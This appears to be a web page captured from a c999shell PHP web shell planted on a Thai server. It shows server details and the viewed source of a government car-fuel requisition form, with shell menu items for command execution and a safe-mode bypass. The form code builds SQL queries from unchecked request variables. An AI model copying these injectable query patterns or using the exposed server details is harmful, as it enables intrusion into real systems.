Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/Car_depart/ drwxr-xr-x |
Viewing file: Select action/file-type: <?php session_start(); /** Define Validate Access */ define( '_VALID_ACCESS', 1 ); /** Check Session User Login */ if( !session_is_registered("valid_user") && !session_is_registered("Priority") ) { echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />"; echo "<p style=padding-top:115px><p align=center><br /><font color=red><strong>กรุณาทำการ Login ก่อน</strong></font></p></p>"; echo "<meta http-equiv=\"refresh\" content=\"1; URL=../login.php\" />"; exit(); } else { /** Configuration */ require_once( "../configuration.php" ); require_once( $_Config_absolute_path . "/includes/framework.php" ); require_once( "../include/Function.php" ); require_once( "../include/FunctionDB.php" ); require_once( "../calendar/check.php" ); require_once( "../calendar/cal_func.php" ); /** Create Database Object */ $dbObj = new DBConn; //=== SESSION $Username = $valid_user; /** Config Table for This Page */ $myTable1 = "personal_tb"; $myTable2 = "formcaroffice"; $myTable3 = "project_tb"; $myTable4 = "training_tb"; $myTable5 = "autocar_tb"; /** Table --> personal_tb */ $query = " SELECT *, prefixName as First_name FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId WHERE Teacher_code='$Teacher_code' "; $result = $dbObj->execQuery($query); $rss = $dbObj->fetchArray($result); //$Teacher_code = $rss['Teacher_code']; /** Table --> tech_plan_tb */ $query1 = " SELECT * FROM $myTable2 WHERE carId='$carId' "; $result1 = $dbObj->execQuery($query1); $rs1 = $dbObj->fetchArray($result1); /** Table --> techplan_method_tb */ $query2 = " SELECT * FROM $myTable3 WHERE codeId='$codeId' "; $result2 = $dbObj->execQuery($query2); $rs2 = $dbObj->fetchArray($result2); /** Table --> tech_spec_tb */ $query5 = " SELECT * FROM $myTable5 WHERE carId='$carId' "; $result5 = $dbObj->execQuery($query5); $rs5 = $dbObj->fetchArray($result5); } # else ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-874" /> <link href="../css/default.css" rel="stylesheet" type="text/css" /> <link href="../css/calendar.css" rel="stylesheet" type="text/css" /> <script language="javascript" src="../js/utilities.js"></script> <script type="text/javascript" src="../js/calendarDateInput2.js"></script> <title>MIS-การขอใช้รถยนต์</title> </head> <body topmargin="0" rightmargin="0" bottommargin="0" leftmargin="0"> <?php include("../templates/incHeaderPlan.php"); ?> <table width="1003" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="203" align="left" valign="top" style="padding:10px 0px 0px 5px"><?php include("./_incMainMenu.php");?></td> <td width="800" height="440" align="center" valign="top" style="padding:10px 0px 5px 10px"><fieldset> <table width="99%" border="0" cellspacing="0" cellpadding="0"> <form id="pc" name="pc" method="post" action="SaveOilCar.php?Budget_year=<?=$Budget_year;?>&carId=<?=$carId;?>"> <tr> <td width="783" height="5"></td> </tr> <tr> <td height="30" background="../images/background/bg-head-topic-w780.gif" class="PADDING-LEFT-10"><strong><a href="index.php">หน้าหลัก</a></strong> <strong>» <a href="PersonalFrom.php">แบบฟอร์ราชการ</a> » <span class="NOTE">ใบขออนญาตใช้รถยนต์ของทางราชการ</span></strong></td> </tr> <tr> <td> </td> </tr> <tr> <td><span class="PADDING-TOP-10"><img src="../images/icons/arrow-circle-225-left.png" width="16" height="16" border="0" align="absmiddle" /> <a href="javascript:;" onclick="window.history.back();"><strong>‹ ย้อนกลับ</strong></a></span></td> </tr> <tr> <td align="center"> <?php ?> <table width="758" border="0" align="center" cellpadding="0" cellspacing="3"> <tr height="31"> <td height="31" colspan="6" align="center" class="PATRON11">ใบขออนุมัติเบิกจ่ายเชื้อเพลิงรถยนต์ราชการ</td> </tr> <tr height="29"> <td height="18" colspan="6">ที่ <?=$rs1['CarNo'];?><?php $collegeCode = $rss["collegeCode"]; $sql = "Select * From college Where collegeStatus ='1'"; $result1 = mysql_query($sql) or die("Error".mysql_error()); $rs2 = mysql_fetch_array($result1); ?> <input name="Teacher_code" type="hidden" id="Teacher_code" value="<? echo $rss["Teacher_code"]?>" /> </td> </tr> <tr height="29"> <td height="18" colspan="3" align="left">ส่วนราชการ <?=$rs2["collegeName"];?></td> <td height="18" colspan="3" align="center"> <?php echo dateThai($rs1['Date']); ?> </td> </tr> <tr height="29"> <td height="23" colspan="3" align="left">เรื่อง <input name="Da " type="text" id="Da " style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" value="ขอเบิกน้ำมันเชื้อเพลิงรถยนต์ราชการ" size="30" readonly/> </td> <td width="92"></td> <td width="234"></td> <td width="76"></td> </tr> <tr height="29"> <td height="29" colspan="5" align="left">เรียน ผู้อำนวยการ <font size="2" face="Tahoma"> <?php $collegeCode = $rss["collegeCode"]; $sql = "Select * From college Where collegeStatus ='1'"; $result1 = mysql_query($sql) or die("Error".mysql_error()); $rs2 = mysql_fetch_array($result1); echo "$rs2[collegeName] "; ?> </font></td> <td> <? /** Table --> personal_tb */ //$query = " SELECT * FROM $myTable1 WHERE Teacher_code='$Teacher_code' "; //$result = $dbObj->execQuery($query); // $rss = $dbObj->fetchArray($result); $Teacher_code = $rss['Teacher_code']; ?> </td> </tr> <tr height="29"> <td width="172" height="25"></td> <td colspan="5" align="left">ข้าพเจ้า<font color="#0000FF" size="2" face="Tahoma"> <input name="Name" type="text" id="Name" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" value="<? echo $rss[First_name]?> <? echo $rss[Teacher_name]?> <? echo $rss[Teacher_lastname]?> " size="30" readonly="readonly" /> </font> ตำแหน่ง <input name="Name2" type="text" id="Name2" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" value=" <? $PositionId = $rss["PositionId"]; $sql = "Select * From position_tb Where PositionId ='$PositionId' "; $result1 = mysql_query($sql) or die("Error".mysql_error()); $rs2 = mysql_fetch_array($result1); echo "$rs2[Position_name] ";?> " size="20" readonly="readonly" /> </td> </tr> <tr height="29"> <td height="29" colspan="6" align="left"><label>ขออนุญาตใช้รถยนต์ไปราชการที่<font color="#0000FF" size="2" face="Tahoma"> <input name="makeWord" type="text" id="makeWord" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" value="<?=$rs1["makeWord"]; ?>" size="60" readonly="readonly"/> </font><font color="#0000FF" size="2" face="Tahoma"> <input name="code" type="hidden" id="code" /> </font> <font face="Tahoma">จังหวัด</strong><font color="#003366" size="2" face="Tahoma"></font><font face="Tahoma"><font color="#003366" size="2" face="Tahoma"> <select name="provinceId" id="provinceId" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" > <?php $strSQL3 = " SELECT * FROM province "; $result3 = mysql_query($strSQL3); while( $rs3 = mysql_fetch_array($result3) ) { ?> <option value="<?=$rs3['provinceId'];?>" <?php if( $rs3['provinceId']==$rs1['provinceId'] ) echo 'selected'; ?>> <?=$rs3['provinceName'];?> </option> <?php } # while ?> </select> </font></font></font></label></td> </tr> <tr height="29"> <td height="29" colspan="6" align="left">เพื่อ<font color="#0000FF" size="2" face="Tahoma"> <input name="Training_name" type="text" id="Training_name" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" value="<? echo $rs1["Training_name"]; ?>" size="80" readonly="readonly"/> </font><font face="Tahoma"><span class="style14">ผู้ร่วมเดินทาง </span></font><font color="#0000FF" size="2" face="Tahoma"> <input name="Make" type="text" id="Make" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" value="<? echo $rs1["Make"]; ?>" size="2" readonly="readonly" /> </font><font face="Tahoma"><span class="style14">คน</span></font></td> </tr> <tr height="29"> <td height="29" colspan="6" align="left">โดย <input name="Detail" type="text" id="Detail" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" value="<? $name1 = $rs1["name1"]; $sql = "Select *, prefixName as First_name FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId Where Teacher_code ='$name1'"; $result3 = mysql_query($sql) or die("Error".mysql_error()); $rs3 = mysql_fetch_array($result3); echo "$rs3[First_name] $rs3[Teacher_name] $rs3[Teacher_lastname]";?>" size="25" readonly="readonly" /> <input name="name1" type="hidden" id="name1" value="<? echo $rs1['name1']; ?>" /> เป็นพนักงานขับรถยนต์ ให้ใช้รถยนต์ <input name="#" type="text" id="#" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" value="<? $sql = "Select * From automobile_tb Where CarmoId ='$rs1[CarmoId]' "; $result2 = mysql_query($sql) or die("Error".mysql_error()); $rs2 = mysql_fetch_array($result2); echo "$rs2[Acc_name] $rs2[Kind] ทะเบียน $rs2[CodeNo]";?>" size="50" readonly="readonly" /> <input name="CarmoId" type="hidden" id="CarmoId" value="<? echo $rs1['CarmoId']; ?>" /></td> </tr> <tr height="29"> <td height="29" colspan="6" align="left"><table width="751"> <tr> <td width="110">อ้างการขอใช้ในวันที่</td> <td width="119"><?php echo dateThai($rs1['Date_start']); ?></td> <td width="109">สิ้นสุดการขอใช้วันที่</td> <td width="154"><?php echo dateThai($rs1['Date_finish']); ?></td> <td width="57">วันที่ขอใช้</td> <td width="174"><?php echo dateThai($rs1['DateCar']); ?></td> </tr> </table></td> </tr> <tr height="29"> <td height="16" colspan="6" align="left"><hr /></td> </tr> <tr height="29"> <td height="29" colspan="6" align="left"><table width="344" align="right"> <tr> <td width="79">วันที่ เติมน้ำมัน</td> <td width="253"><script>DateInput('mDate4', true,'DD/MM/YYYY','<?=(isset($rs5["DateCar"]))?ymdE2dmyE2($rs5["DateCar"]):date("d/m/Y");?>');</script></td> </tr> </table></td> </tr> <tr height="29"> <td height="29" colspan="6" align="left"><table width="719"> <tr> <td width="138"> </td> <td width="554">อ้างใบสั่งเชื้อเพลิงเล่มที่ <input name="Number" type="text" id="Number" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" value="<?=$rs5['Number'];?>" onkeypress="return checkNumeric(); " size="5" /> เลขที่ <input name="Volume" type="text" id="Volume" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" onkeypress="return checkNumeric(); " value="<?=$rs5['Volume'];?>" size="5"/> </td> </tr> </table></td> </tr> <tr height="29"> <td height="29" colspan="6" align="left">เลขวัดระยะที่หน้าปัทม์ <input name="Mile_start" type="text" id="Mile_start2" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" onkeypress="return checkNumeric(); " value="<?=$rs5['Mile_start'];?>" size="10" maxlength="6" readonly="readonly"/> ถึงเลขวัดระยะที่หน้าปัทม์ <input name="Mile_finish" type="text" id="Mile_finish" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" onkeypress="return checkNumeric(); " value="<?=$rs5['Mile_finish'];?>" size="10" maxlength="6" readonly="readonly"/> จำนวนระยะ <input name="#" type="text" id="#" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" value="<?=$rs5['Num_Mile'];?>" size="5" onkeypress="return checkNumeric(); " readonly="readonly"/> กิโลเมตร</td> </tr> <tr height="29"> <td height="29" colspan="6" align="left">เบิกจ่ายเชื้อเพลิงครั้งนี้ประเภท <input name="#" type="text" id="#" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" value="<?=$rs5['Num_Lish'];?>" size="8" maxlength="3" readonly="readonly"/> ลิตร จำนวนเงิน <input name="#" type="text" id="#4" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" value="<?=$rs5['PriceOill'];?>" size="10" readonly="readonly"/> บาท</td> </tr> <tr height="29"> <td height="29" colspan="6" align="left">เที่ยวไป (เติมน้ำมัน ) <input name="Lish_start" type="text" id="Lish_start" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed"onkeypress="return checkNumeric(); " value="<?=$rs5['Lish_start'];?>" size="5" maxlength="3"/> ลิตร จำนวนเงิน <input name="Price_start" type="text" id="Price_start" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" value="<?=$rs5['Price_start'];?>" onkeypress="return checkNumeric(); "size="10"/> บาท เลขวัดระยะที่หน้าปัทม์ <input name="Num_start" type="text" id="Num_start" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" onkeypress="return checkNumeric(); " value="<?=$rs5['Num_start'];?>"size="10" maxlength="6"/></td> </tr> <tr height="29"> <td height="29" colspan="6" align="left">เที่ยวกลับ (เติมน้ำมัน ) <input name="Lish_finish" type="text" id="Lish_finish" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed"onkeypress="return checkNumeric(); " value="<?=$rs5['Lish_finish'];?>" size="5" maxlength="3"/> ลิตร จำนวนเงิน <input name="Price_finish" type="text" id="Price_finish" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" value="<?=$rs5['Price_finish'];?>" onkeypress="return checkNumeric(); " size="10"/> บาท เลขวัดระยะที่หน้าปัทม์ <input name="Num_finish" type="text" id="Num_finish" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" onkeypress="return checkNumeric(); " value="<?=$rs5['Num_finish'];?>"size="10" maxlength="6"/></td> </tr> <tr height="29"> <td height="16" colspan="6" align="left">สถานะการใช้เงินเติมน้ำมัน <input name="Cadit" type="radio" id="Cadit2" value="Dr" <?php if($rs5["Cadit"] == "Dr" ) echo 'checked'; ?> /> เงินสด <input name="Cadit" type="radio" id="Cadit2" value="Cr" <?php if($rs5["Cadit"] == "Cr" ) echo 'checked'; ?> /> บัตรเครดิตเติมน้ำมัน</td> </tr> <tr height="29"> <td height="18" colspan="6" align="left"> </td> </tr> <!-- <tr height="29"> <td height="29" colspan="6" align="center"><span class="PADDING-LEFT-10"><font size="2" face="Tahoma" ><a href="javascript:;" onclick="NewWindow('AddOil.php?carId=<?php echo $rs1['carId']; ?>','Detail','scrollbars=yes,width=600,height=300')"><img src="../picture/new.gif" alt="เพิ่มรายการเอกสาร" width="16" height="16" border="0" /></a></font><font color="#000000"> <span class="style22"> เพิ่มรายการใช้น้ำมันและเลขวัดระยะที่หน้าปัทม์ <font size="2" face="Tahoma" > <a href="javascript:;" onclick="NewWindow('FrmOil.php?carId=<?php echo $rs1['carId']; ?>','Detail','scrollbars=yes,width=600,height=300')"><img src="../picture/editnew.gif" alt="แก้ไขรายการเอกสาร" width="16" height="16" border="0" /></a></font><font color="#000000"> แก้ไขรายการใช้น้ำมันและเลขวัดระยะที่หน้าปัทม์</font></span></font></span></td> </tr> --> <tr height="31"> <td height="22" colspan="3" align="center"> </td> <td> </td> <td align="center">ลงชื่อ...................................</td> <td></td> </tr> <tr height="29"> <td height="24" colspan="3" align="center">ลงชื่อ............................</td> <td></td> <td align="center">(<? echo $rss[First_name]?> <? echo $rss[Teacher_name]?> <? echo $rss[Teacher_lastname]?>)</td> <td></td> </tr> <tr height="29"> <td height="24" colspan="3" align="center">( <? $name1 = $rs1["name1"]; $sql = "Select *, prefixName as First_name FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId Where Teacher_code ='$name1'"; $result3 = mysql_query($sql) or die("Error".mysql_error()); $rs3 = mysql_fetch_array($result3); echo "$rs3[First_name] $rs3[Teacher_name] $rs3[Teacher_lastname]";?> )</td> <td></td> <td align="center">ตำแหน่ง<font color="#0000FF" size="2" face="Tahoma"> <input name="Name3" type="text" id="Name3" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" size="20" value="<? $sql = "Select * From position_tb Where PositionId ='$rss[PositionId]' "; $result1 = mysql_query($sql) or die("Error".mysql_error()); $rs2 = mysql_fetch_array($result1); echo "$rs2[Position_name] ";?> " /> </font></td> <td></td> </tr> <tr height="31"> <td height="16" colspan="3" align="center">วันที่......./............./.......</td> <td colspan="3" align="left"> </td> </tr> <tr height="29"> <td height="21" colspan="3" align="center"> </td> <td></td> <td align="center">ลงชื่อ ...............................</td> <td></td> </tr> <tr height="29"> <td height="18" colspan="3" align="center"> </td> <td colspan="3" align="center"> (........................... ) </td> </tr> <tr height="29"> <td height="23" colspan="3" align="left"> </td> <td colspan="3" align="center">ตำแหน่ง<input name="Name4" type="text" id="Name5" style="BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: black 1px dashed" size="20" value=" หัวหน้ายานพาหนะ " /> </td> </tr> <tr height="29"> <td height="29" colspan="3" align="center"> </td> <td colspan="3" align="center">วันที่......เดือน................พ.ศ......</td> </tr> <tr height="31"> <td height="17"></td> <td width="3"></td> <td width="160"></td> <td colspan="2" align="center"> ผู้มีอำนาจอนุมัติสั่งจ่ายเชื้อเพลิง</td> <td></td> </tr> <tr height="29"> <td height="29"></td> <td></td> <td></td> <td colspan="3" align="center">ลงชื่อ.......................... .</td> </tr> <tr height="29"> <td height="27"></td> <td></td> <td></td> <td colspan="3" align="center">ตำแหน่ง.......................................</td> </tr> <tr height="29"> <td height="25"></td> <td></td> <td></td> <td colspan="3" align="center">วันที่........เดือน...............พ.ศ..... .</td> </tr> <tr height="31"> <td height="10" colspan="6" align="center"><hr /></td> </tr> </table></td> </tr> <tr> <td align="center"></td> </tr> <tr> <td align="center"> </td> </tr> <tr> <td align="center"><input name="Status" type="hidden" id="Status" value="<? echo $rs1['Status']; ?>" /> <input name="Budget_year" type="hidden" id="Budget_year" value="<? echo $Budget_year; ?>" /> <input name="carId" type="hidden" id="carId" value="<? echo $rs1['carId']; ?>" /> <input type="submit" name="Submit" value="บันทึก" class="WIDTH60 CURSOR-HAND" /> <input type="reset" name="Reset" value="รีเซ็ต" class="WIDTH60 CURSOR-HAND" /> <input type="button" name="Button" value="ยกเลิก" class="WIDTH60 CURSOR-HAND" onclick="location.href='FormCarList.php?Teacher_code=<?=$Teacher_code;?>'" /></td> </tr></form> </table> </fieldset></td> </tr> </table> <?php include("../templates/incFooter.php"); ?> </body> </html> <?php /** Free Resource */ $dbObj->freeresult($result1); /** Close the Database */ $dbObj->disconn(); /** Unset Class */ unset($dbObj); ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0058 ]-- |